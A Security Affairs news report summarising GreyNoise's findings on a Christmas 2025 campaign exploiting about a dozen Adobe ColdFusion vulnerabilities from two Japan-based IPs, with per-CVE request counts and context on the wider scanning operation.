Security Affairs
U.S. Government Agency Paid $1M to Data Extortion Group Kairos|FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials|Pegasus Used Against MEP Investigating Pegasus, Citizen Lab Finds|JADEPUFFER: First End-to-End AI-Driven Ransomware Operation|The Anatomy of a Shadow AI Supply-Chain Breach: Lessons from the 2026 Vercel Incident|Law enforcememt operation disrupted Malicious Residential Proxy Networks NetNut|Government and Healthcare Are the Weakest Links in Global Email Security|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|U.S. Government Agency Paid $1M to Data Extortion Group Kairos|FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials|Pegasus Used Against MEP Investigating Pegasus, Citizen Lab Finds|JADEPUFFER: First End-to-End AI-Driven Ransomware Operation|The Anatomy of a Shadow AI Supply-Chain Breach: Lessons from the 2026 Vercel Incident|Law enforcememt operation disrupted Malicious Residential Proxy Networks NetNut|Government and Healthcare Are the Weakest Links in Global Email Security|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|
Advertisement

Ad Placeholder

Full Width × 90

Hacking

Thousands of ColdFusion exploit attempts spotted during Christmas holiday

GreyNoise observed thousands of attacks targeting about a dozen Adobe ColdFusion vulnerabilities during the Christmas 2025 holiday. GreyNoise reports a coordinated campaign exploiting about a dozen Adobe ColdFusion vulnerabilities, with thousands of attack attempts observed during the Christmas 2025 holiday. “GreyNoise observed a coordinated exploitation campaign targeting Adobe ColdFusion servers over the Christmas 2025 holiday period.” reads […]

Adobe Acrobat Reader CVE-2026-34621

GreyNoise observed thousands of attacks targeting about a dozen Adobe ColdFusion vulnerabilities during the Christmas 2025 holiday.

GreyNoise reports a coordinated campaign exploiting about a dozen Adobe ColdFusion vulnerabilities, with thousands of attack attempts observed during the Christmas 2025 holiday.

“GreyNoise observed a coordinated exploitation campaign targeting Adobe ColdFusion servers over the Christmas 2025 holiday period.” reads the report published by GreyNoise. “The attack appears to be a single threat actor operating from Japan-based infrastructure (CTG Server Limited). This source was responsible for ~98% of attack traffic, systematically exploiting 10+ ColdFusion CVEs from 2023-2024.”

A single actor, using Japan-based infrastructure, generated about 98% of the traffic and exploited more than 10 ColdFusion CVEs from 2023–2024. The attacks used ProjectDiscovery Interactsh for out-of-band verification, with JNDI/LDAP injection as the main vector. Most activity occurred on Christmas Day, suggesting deliberate timing to exploit reduced security monitoring.

The researchers observed 5,940 malicious requests exploiting ColdFusion vulnerabilities from 2023–2024, peaking on December 25.

Most of the requests targeted servers in the US (4,044), Spain (753), and India (128).

GreyNoise identified a dominant threat actor using two IPs (134.122.136[.]119, 134.122.136[.]96) hosted by CTG Server Limited (AS152194), responsible for nearly all observed ColdFusion exploitation traffic. The two IPs accounted for over 98% of requests, operated concurrently in many cases, shared Interactsh sessions, and showed automated, coordinated behavior cycling through multiple attack types. Minor activity came from a handful of secondary IPs across Canada, India, the US, and Cloudflare. CTG Server Limited, a Hong Kong–registered provider with rapid IP space growth, has prior links to phishing, spam, bogon routing, and weak abuse enforcement, raising concerns about its role as a permissive hosting environment.

Below is the list of targeted ColdFusion vulnerabilities:

CVETypeRequests
Generic RCERemote Code Execution1,403
Generic LFILocal File Inclusion904
CVE-2023-26359Deserialization RCE833
CVE-2023-38205Access Control Bypass654
CVE-2023-44353Remote Code Execution611
CVE-2023-38203Remote Code Execution346
CVE-2023-38204Remote Code Execution346
CVE-2023-29298Access Control Bypass342
CVE-2023-29300Remote Code Execution176
CVE-2023-26347Access Control Bypass171
CVE-2024-20767Arbitrary File Read146
CVE-2023-44352Reflected XSS8

Analysis shows the ColdFusion activity was only about 0.2% of a much larger vulnerability scanning campaign conducted from the same two IPs. Overall, the operation generated more than 2.5 million requests, targeting a total of 767 CVEs spanning 2001–2025, with over 1,200 attack signatures and thousands of unique fingerprints and OAST domains.

The campaign focused mainly on reconnaissance, followed by CVE exploitation, LFI, and RCE attempts. It targeted more than 47 technology stacks, including Java application servers, web frameworks, CMS platforms, network devices, and enterprise software. The scale, breadth of CVEs, and automation indicators point to a systematic, template-based reconnaissance effort covering the global vulnerability landscape.

The experts published Indicators of Compromise for this campaign.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Adobe)